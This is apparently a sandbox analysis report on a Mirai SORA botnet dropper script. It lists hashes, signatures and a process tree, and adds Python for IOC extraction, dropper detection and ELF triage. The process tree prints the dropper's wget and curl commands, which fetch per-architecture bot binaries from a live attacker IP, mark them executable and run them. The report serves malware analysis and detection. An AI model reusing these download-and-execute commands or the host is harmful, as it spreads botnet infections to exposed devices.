Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
  • submitted
    03-08-2024 05:14

General

  • Target

    sora.sh

  • Size

    2KB

  • MD5

    fe9fcc98f0d2d8350fd699bb3edf3419

  • SHA1

    5480c071e63cc7dd040b18ebc62c4a3cb7d5b5eb

  • SHA256

    faa68fe6ab7972ae17be23f4bed8c482a676935fcf257dca0cc6e51699e16213

  • SHA512

    4994f7fc91e833a29b978f9ddd49657554ba0b4cf4c7e3f6d0d956447c45eb876f85e97644481267b58cd0172d471a0e6da89bba9998d14a22ebf499695d054c

Malware Config

Extracted

Family

mirai

Botnet

SORA

Signatures

  • Mirai

    Mirai is a prevalent Linux malware family that infects exposed network devices.

  • Contacts a large number (43719) of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large number of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Executes dropped EXE 14 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai disables the hardware watchdog so that it cannot reboot the infected device; a reboot would clear the memory-resident bot.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX or with a modified build of the UPX open-source packer.

  • Changes its process name 1 IoCs
  • Reads runtime system information 35 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 26 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sora.sh
    /tmp/sora.sh
    1⤵
    • Writes file to tmp directory
    PID:709
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.x86
      2⤵
      • Writes file to tmp directory
      PID:714
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:735
    • /bin/cat
      cat sora.x86
      2⤵
      PID:739
    • /bin/chmod
      chmod +x robben sora.sh sora.x86 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9
      2⤵
      PID:741
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:742
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.mips
      2⤵
      • Writes file to tmp directory
      PID:745
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.mips
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:786
    • /bin/cat
      cat sora.mips
      2⤵
      PID:787
    • /bin/chmod
      chmod +x robben sora.mips sora.sh sora.x86 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9
      2⤵
      PID:788
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Changes its process name
      • Reads runtime system information
      PID:789
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.x86_64
      2⤵
      • Writes file to tmp directory
      PID:796
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.x86_64
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:797
    • /bin/cat
      cat sora.x86_64
      2⤵
      PID:798
    • /bin/chmod
      chmod +x robben sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9
      2⤵
      PID:799
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:800
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.i468
      2⤵
      PID:802
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.i468
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:803
    • /bin/cat
      cat sora.i468
      2⤵
      PID:810
    • /bin/chmod
      chmod +x robben sora.i468 sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9
      2⤵
      PID:811
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:812
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.i686
      2⤵
      • Writes file to tmp directory
      PID:815
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.i686
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:822
    • /bin/cat
      cat sora.i686
      2⤵
      PID:842
    • /bin/chmod
      chmod +x robben sora.i468 sora.i686 sora.mips sora.sh sora.x86 sora.x86_64
      2⤵
      PID:843
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:844
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.mpsl
      2⤵
      • Writes file to tmp directory
      PID:846
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.mpsl
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:847
    • /bin/cat
      cat sora.mpsl
      2⤵
      PID:848
    • /bin/chmod
      chmod +x robben sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64
      2⤵
      PID:849
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:850
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.arm4
      2⤵
      PID:852
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.arm4
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:853
    • /bin/cat
      cat sora.arm4
      2⤵
      PID:854
    • /bin/chmod
      chmod +x robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64
      2⤵
      PID:855
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:856
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.arm5
      2⤵
      • Writes file to tmp directory
      PID:857
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.arm5
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:858
    • /bin/cat
      cat sora.arm5
      2⤵
      PID:859
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64
      2⤵
      PID:860
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:861
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.arm6
      2⤵
      • Writes file to tmp directory
      PID:863
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.arm6
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:864
    • /bin/cat
      cat sora.arm6
      2⤵
      PID:865
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64
      2⤵
      PID:866
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:867
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.arm7
      2⤵
      • Writes file to tmp directory
      PID:869
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.arm7
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:870
    • /bin/cat
      cat sora.arm7
      2⤵
      PID:871
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64
      2⤵
      PID:872
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:873
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.ppc
      2⤵
      • Writes file to tmp directory
      PID:875
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.ppc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:876
    • /bin/cat
      cat sora.ppc
      2⤵
      PID:877
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 sora.x86_64
      2⤵
      PID:878
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:879
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.ppc440fp
      2⤵
      PID:881
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.ppc440fp
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:882
    • /bin/cat
      cat sora.ppc440fp
      2⤵
      PID:883
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_64
      2⤵
      PID:884
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:885
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.m68k
      2⤵
      • Writes file to tmp directory
      PID:886
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.m68k
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:887
    • /bin/cat
      cat sora.m68k
      2⤵
      PID:888
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_64
      2⤵
      PID:889
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:890
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.sh4
      2⤵
      • Writes file to tmp directory
      PID:892
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.sh4
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:893
    • /bin/cat
      cat sora.sh4
      2⤵
      PID:894
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.sh4 sora.x86 sora.x86_64
      2⤵
      PID:895
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:896
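The process tree is one dropper loop run once per architecture: fetch sora.<arch> with wget and then curl, cat it (the redirection that writes the output into robben is not visible in the tree and is assumed here), chmod +x everything in /tmp (the systemd-private-... directory swept up by chmod suggests a bare * glob), then run ./robben Payload. The Python below is an added example and not part of the sandbox output or the malware: it extracts IOCs from those command lines and flags the download, chmod, execute-from-/tmp sequence in constructed execve-style events. The event schema (pid, ppid, cwd, exe, argv) is assumed for the example, not a real audit record format.

```python
"""Reconstruct the SORA dropper loop from the sandbox process tree and turn
it into IOCs plus a behavioural detection.

Added example for this report; it is not sandbox or malware code. The
command lines are copied from the Processes section; the execve-style
events are constructed to mirror that tree and use an assumed schema.
"""
import re
import shlex
from collections import defaultdict
from urllib.parse import urlparse

# Three iterations of the loop as they appear in the report.  The
# redirection that writes `cat` output into robben is not visible in the
# tree and is an assumption about the script.
PROCESS_COMMANDS = [
    "wget http://91.92.252.2/bins/sora.x86",
    "curl -O http://91.92.252.2/bins/sora.x86",
    "cat sora.x86",
    "chmod +x robben sora.sh sora.x86",
    "./robben Payload",
    "wget http://91.92.252.2/bins/sora.mips",
    "curl -O http://91.92.252.2/bins/sora.mips",
    "cat sora.mips",
    "./robben Payload",
    "wget http://91.92.252.2/bins/sora.arm7",
    "curl -O http://91.92.252.2/bins/sora.arm7",
    "./robben Payload",
]

URL_RE = re.compile(r"https?://[^\s'\"]+")
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def extract_iocs(commands):
    """Pull hosts, URLs, target architectures and the dropped binary name
    out of dropper command lines."""
    urls, hosts, archs, dropped, exec_args = set(), set(), set(), set(), set()
    for cmd in commands:
        argv = shlex.split(cmd)
        for url in URL_RE.findall(cmd):
            urls.add(url)
            parsed = urlparse(url)
            hosts.add(parsed.hostname)
            name = parsed.path.rsplit("/", 1)[-1]
            if "." in name:
                archs.add(name.rsplit(".", 1)[1])  # sora.x86 -> x86
        if argv and argv[0].startswith("./"):
            dropped.add(argv[0][2:])
            exec_args.update(argv[1:])
    return {
        "hosts": sorted(hosts),
        "urls": sorted(urls),
        "architectures": sorted(archs),
        "dropped_binaries": sorted(dropped),
        "exec_args": sorted(exec_args),
    }


def detect_tmp_dropper(events):
    """Flag a parent that downloads into a scratch directory, chmods, and
    then executes a file living in that directory.  Each event is a dict
    with pid, ppid, cwd, exe (resolved path) and argv; the schema is
    assumed for this example, not a real audit record format."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev["ppid"]].append(ev)
    hits = []
    for ppid, children in by_parent.items():
        downloaded = chmodded = False
        for ev in children:  # events are in execution order
            tool = ev["exe"].rsplit("/", 1)[-1]
            in_scratch = ev["cwd"].startswith(SCRATCH_DIRS)
            if tool in DOWNLOADERS and in_scratch:
                downloaded = True
            elif tool == "chmod" and downloaded:
                chmodded = True
            elif chmodded and ev["exe"].startswith(ev["cwd"].rstrip("/") + "/"):
                hits.append({"ppid": ppid, "pid": ev["pid"], "exe": ev["exe"],
                             "argv": ev["argv"]})
    return hits


# Constructed events mirroring the first loop iteration (PIDs from the
# report) followed by a benign fetch-and-install that must not fire.
SAMPLE_EVENTS = [
    {"pid": 714, "ppid": 709, "cwd": "/tmp", "exe": "/usr/bin/wget",
     "argv": ["wget", "http://91.92.252.2/bins/sora.x86"]},
    {"pid": 735, "ppid": 709, "cwd": "/tmp", "exe": "/usr/bin/curl",
     "argv": ["curl", "-O", "http://91.92.252.2/bins/sora.x86"]},
    {"pid": 739, "ppid": 709, "cwd": "/tmp", "exe": "/bin/cat",
     "argv": ["cat", "sora.x86"]},
    {"pid": 741, "ppid": 709, "cwd": "/tmp", "exe": "/bin/chmod",
     "argv": ["chmod", "+x", "robben", "sora.sh", "sora.x86"]},
    {"pid": 742, "ppid": 709, "cwd": "/tmp", "exe": "/tmp/robben",
     "argv": ["./robben", "Payload"]},
    {"pid": 900, "ppid": 880, "cwd": "/tmp", "exe": "/usr/bin/wget",
     "argv": ["wget", "https://mirror.example/pkg.deb"]},
    {"pid": 901, "ppid": 880, "cwd": "/tmp", "exe": "/usr/bin/dpkg",
     "argv": ["dpkg", "-i", "pkg.deb"]},
]

if __name__ == "__main__":
    print(extract_iocs(PROCESS_COMMANDS))
    print(detect_tmp_dropper(SAMPLE_EVENTS))
```

Only the run after sora.mips (PID 789) fires the Mirai-specific signatures, which is what you would expect on a MIPS big-endian sandbox: every other robben is the wrong architecture and exits immediately. A detection keyed on the loop shape, rather than on any one binary succeeding, catches the dropper regardless of which variant happens to run on the victim.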

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/robben

    Filesize

    27KB

    MD5

    545cc0b3e5dae8244debe55a41e14a9f

    SHA1

    101ad459b5b114c0a79c458cd0c0d2374a3698a1

    SHA256

    a916866d96e7215899fb4387c14b52725ec83de463dd0302c8cc72b8cade2d91

    SHA512

    1e90d63777c07e490540fe00f41a2f50d157c0e2b7c979204e8fc5a9775cbdd21a7e317290c82c552897cdb30320a08d1ca705e33e1d947e837ff14e6ca56611

  • /tmp/robben

    Filesize

    28KB

    MD5

    8d068eba527935d34fbff880f4cf7530

    SHA1

    82f50f55fb025735b62fca14362600132b21c2d0

    SHA256

    bce45bca1f30fecce6ce8bf4c4dfcc1c9c19517144398aa91b9a63c01995c147

    SHA512

    6cc29217a507b4072469b11f63a8da070a70e4228a36a0ea612f905789ca0f829c47bd290d9c09024bfe88c7e28fff8d430e9e9def5a6124b90cedb49f029c14

  • /tmp/robben

    Filesize

    28KB

    MD5

    fa8042bc292cb4403494d779833de7ca

    SHA1

    a78431e9ef2fac7f3a909c06a81e643369a17ee4

    SHA256

    1ec5ec93f91f140dbdfbb8a3f79828be32737673e60b6b8999d3a5c520a1b5f5

    SHA512

    fe9e309c7b18a1c25d10d418cea499a1385f4c227fb5a64e491b1ca3d5819a5677f80280194b4dcc2aa7cc69aa6b7c1775a3cd54143f45aed0dc0ddcb199de82

  • /tmp/robben

    Filesize

    212B

    MD5

    83ab6cd9a67528bbc6f4f360cb7f8d83

    SHA1

    07e8f17209e0569aab39f062568ff0090d9b20d4

    SHA256

    3ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435

    SHA512

    171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f

  • /tmp/robben

    Filesize

    28KB

    MD5

    a9d839dd97abb474595bc7e18157aa64

    SHA1

    82c1ec7eae6dd1bc7dcfd1e89911d328c899c885

    SHA256

    3bb3ff14162d0b66a51f448e8ff9e9018aa0040941de829f8748911b4471d90d

    SHA512

    4311ce9b061bf6f01b3b004eb0c0b14a4fb86b1a11c040fd8b633c3a3a27821c74775a4eeec82d22e8eacddbc35736814800dcf9dbca85218f189fda4b1d8993

  • /tmp/robben

    Filesize

    64KB

    MD5

    5092e7b4c0b2e9e418ca596ddad29165

    SHA1

    41edb1d01dcd2bacfd437cad4af32791e473e1c0

    SHA256

    43c3fe213b5a161348b2036c0bdf95b5c72d48d55ed3e2557a91a078de5bb845

    SHA512

    d4004f22ad4142cef16dd5dea79598b69b94667dac47affaee45f7a16c64ee859654930315d1cec9aaf374f1d62a1c34239f8a8b42f41855f353ffd6d773e742

  • memory/789-1-0x00400000-0x00455b00-memory.dmp
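Every Downloads entry carries the same path, /tmp/robben, because each architecture's binary is written over the previous one; the six distinct hash sets are six different files, and the 212B entry is far too small to be an ELF (most likely a server error body, though the report does not say). The Python below is an added example, not sandbox code: it hashes each blob, parses the ELF header for architecture and endianness, and looks for the "UPX!" marker that the "UPX packed file" signature keys on. The byte strings are constructed stand-ins (the report gives only sizes and hashes), so their digests will not match those listed above.

```python
"""Triage the dropped /tmp/robben variants: hash each blob, check for an
ELF header, read the target architecture and endianness, and look for
the UPX marker.

Added example for this report, not sandbox code.  The byte strings are
constructed stand-ins for the real downloads, so their digests will not
match the ones in the Downloads list.
"""
import hashlib
import struct

# e_machine values from the ELF specification for the architectures the
# dropper fetches (x86, m68k, mips, ppc, arm, sh, x86_64).
E_MACHINE = {3: "x86", 4: "m68k", 8: "mips", 20: "ppc", 40: "arm", 42: "sh", 62: "x86_64"}


def triage(blob):
    """Describe one downloaded artifact; non-ELF blobs (an HTTP error page,
    a truncated download) come back with elf=False and arch=None."""
    info = {
        "size": len(blob),
        "md5": hashlib.md5(blob).hexdigest(),
        "sha256": hashlib.sha256(blob).hexdigest(),
        "elf": False, "arch": None, "endian": None, "upx": False,
    }
    if len(blob) < 20 or blob[:4] != b"\x7fELF":
        return info
    big = blob[5] == 2          # EI_DATA: 1 = little-endian, 2 = big-endian
    info["elf"] = True
    info["endian"] = "big" if big else "little"
    (e_machine,) = struct.unpack(">H" if big else "<H", blob[18:20])
    info["arch"] = E_MACHINE.get(e_machine, f"unknown({e_machine})")
    # Stock UPX writes a "UPX!" magic in its packer header near the start of
    # the file; modified UPX builds often overwrite it, so absence is not
    # proof that the file is unpacked.
    info["upx"] = b"UPX!" in blob[:4096]
    return info


def triage_all(samples):
    return {name: triage(blob) for name, blob in samples.items()}


def dedupe_by_sha256(samples):
    """Downloads entries share the path /tmp/robben; key them by content so
    each distinct variant is counted once."""
    unique = {}
    for name, blob in samples.items():
        unique.setdefault(hashlib.sha256(blob).hexdigest(), name)
    return unique


def build_elf_stub(e_machine, big_endian, body):
    """Constructed 52-byte ELF32 header followed by a body; not a runnable
    binary, just enough for header parsing."""
    e_ident = b"\x7fELF" + bytes([1, 2 if big_endian else 1, 1]) + b"\x00" * 9
    fmt = ">HHI" if big_endian else "<HHI"
    return e_ident + struct.pack(fmt, 2, e_machine, 1) + b"\x00" * 28 + body


# Constructed stand-ins: a MIPS big-endian UPX-packed binary (the kind the
# debian9-mipsbe sandbox could actually run), the same file under a second
# name, an ARM little-endian unpacked one, and a short HTML error page of
# the kind a failed fetch leaves on disk.
SAMPLES = {
    "robben-mips": build_elf_stub(8, True, b"UPX!\x0d\x0c\x0c\x0e" + b"\x00" * 100),
    "robben-mips-copy": build_elf_stub(8, True, b"UPX!\x0d\x0c\x0c\x0e" + b"\x00" * 100),
    "robben-arm": build_elf_stub(40, False, b"\x00" * 100),
    "robben-404": b"<html><head><title>404 Not Found</title></head>"
                  b"<body><h1>404 Not Found</h1></body></html>",
}

if __name__ == "__main__":
    for name, info in triage_all(SAMPLES).items():
        print(name, info)
    print(len(dedupe_by_sha256(SAMPLES)), "distinct variants")
```

When the packer header has been altered and the marker check comes back empty, the memory dump listed above for PID 789 (the sora.mips run that tripped the watchdog and process-name signatures) is the place to recover an unpacked image: the dumped region 0x00400000-0x00455b00 is several times larger than any of the 27KB to 64KB files on disk, which is consistent with the decompressed bot.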